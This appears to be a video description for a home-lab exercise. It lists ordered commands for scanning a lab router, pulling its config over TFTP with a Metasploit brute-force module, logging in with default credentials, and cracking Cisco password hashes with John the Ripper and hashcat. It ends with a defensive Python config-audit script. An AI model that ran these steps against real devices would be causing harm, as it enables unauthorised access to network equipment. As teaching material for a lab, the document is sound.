Project 20 - Hash Cracking w/ John The Ripper and Hashcat!
Author: Daryl Shows His Work
Uploaded: 2025-09-21
Views: 14
Description:
Commands used (in the order they appear in the video)
1. sudo su
2. Enter Password
3. arp-scan --localnet
4. nmap 172.20.1.101
5. nmap -sU 172.20.1.101 -p 69 (UDP scan on TFTP port 69)
Trivial File Transfer Protocol - a simple protocol commonly used to transfer small configuration files to network devices like routers and switches.
6. tftp 172.20.1.101 (TFTP is cleartext and lacks authentication and encryption. Since it has no command of its own to list files, let's use Metasploit to scan for some.)
7. quit
8. msfconsole (to start up metasploit framework)
9. search tftpbrute
10. use auxiliary/scanner/tftp/tftpbrute
11. show options (to see that the remote host needs to be set)
12. set RHOSTS 172.20.1.101
13. run (2 files will appear, remote-config and test.txt)
14. exit
15. tftp 172.20.1.101
16. get test.txt
17. get remote-config
18. quit
19. ls
20. cat remote-config (scroll up to see username: admin , password: admin)
21. ssh [email protected]
22. enable (to enter privileged EXEC mode)
23. configure terminal
24. enable password test
25. exit x 2
26. enable (password: test)
27. show running-config (scroll up to see username: cisco , password: cisco)
28. configure terminal
29. enable secret P@ssw0rd (to generate MD5 hash value of P@ssw0rd)
30. enable secret level 5 P@ssw0rd (does the same thing)
31. show running-config (scroll up to see secret level 5 password hash)
32. exit
33. enable (try password test, which should fail, then P@ssw0rd)
34. exit x2
35. echo "\$1\$mERr\$uPOU5aamVaETEvWzvDbvp." > hash.txt (copy and paste this into the terminal to store the output in a new hash.txt file)
36. hashid hash.txt (gives us the information about the hash algorithm contained in the file)
Using John The Ripper and hashcat to crack MD5 passwords
37. john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt (conducts a dictionary attack: commonly used passwords from the wordlist are hashed and compared against the target hash until one matches, revealing the plaintext password)
38. john -show hash.txt (shows cracked passwords)
39. hashcat -a 0 -m 500 hash.txt /usr/share/wordlists/rockyou.txt --show (runs hashcat and outputs the cracked password)
Using Python script to crack Type 7 Password (used by Cisco routers)
40. cat remote-config
41. Scroll up to see Type 7 Password
42. cd /brute-force
43. python3 ciscot7.py -d -p 01150F165E1C07032D
44. cd / (to go back to the root directory)
45. cat /hashes/type_8.hash (to see type 8 cipher text)
46. hashcat -m 9200 -a 0 /hashes/type_8.hash /usr/share/wordlists/rockyou.txt --show (runs hashcat and outputs the cracked password)
47. cat /hashes/type_9.hash (to see type 9 cipher text)
48. hashcat -m 9300 -a 0 --force /hashes/type_9.hash /usr/share/wordlists/rockyou.txt --show (runs hashcat and outputs the cracked password)
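
Seen from the defending side, the steps above come down to which credential types are stored in a device config. The following Python audit is an added example, not part of the video or its description: it flags each credential line by storage type without echoing the secret. The sample config is constructed (reusing the Type 5 and Type 7 values shown above), and the replace/upgrade/keep verdicts are this example's assumed policy.

```python
import re

# Constructed sample config; the Type 5 and Type 7 values are the ones shown above.
SAMPLE = """\
hostname lab-router
enable secret 5 $1$mERr$uPOU5aamVaETEvWzvDbvp.
enable password test
username admin password 0 admin
username cisco privilege 15 secret 9 $9$CONSTRUCTED$placeholder
line vty 0 4
 password 7 01150F165E1C07032D
"""

# type digit -> (scheme, verdict, hashcat mode used in the steps above)
# Verdicts are this example's assumed policy, not vendor output.
SCHEMES = {
    "0": ("plaintext", "replace", None),
    "7": ("Type 7 reversible encoding", "replace", None),
    "5": ("Type 5 MD5-crypt", "upgrade", 500),
    "8": ("Type 8 PBKDF2-SHA256", "keep", 9200),
    "9": ("Type 9 scrypt", "keep", 9300),
}

# keyword, optional "level N", optional one-digit type, then the stored value
CRED = re.compile(
    r"\b(?P<kw>password|secret)(?:\s+level\s+\d+)?"
    r"(?:\s+(?P<type>\d)(?=\s))?\s+(?P<value>\S+)\s*$"
)

def audit(config_text):
    """Return one finding per credential line; the secret itself is never copied."""
    findings = []
    for lineno, raw in enumerate(config_text.splitlines(), 1):
        line = raw.strip()
        if not line.startswith(("enable ", "username ", "password ")):
            continue
        m = CRED.search(line)
        if not m:
            continue
        type_id = m.group("type") or "0"  # no type digit: stored exactly as typed
        scheme, verdict, mode = SCHEMES.get(type_id, ("unknown type", "review", None))
        findings.append({"line": lineno, "type": type_id, "scheme": scheme,
                         "verdict": verdict, "hashcat_mode": mode})
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"line {f['line']}: {f['scheme']} -> {f['verdict']}")
```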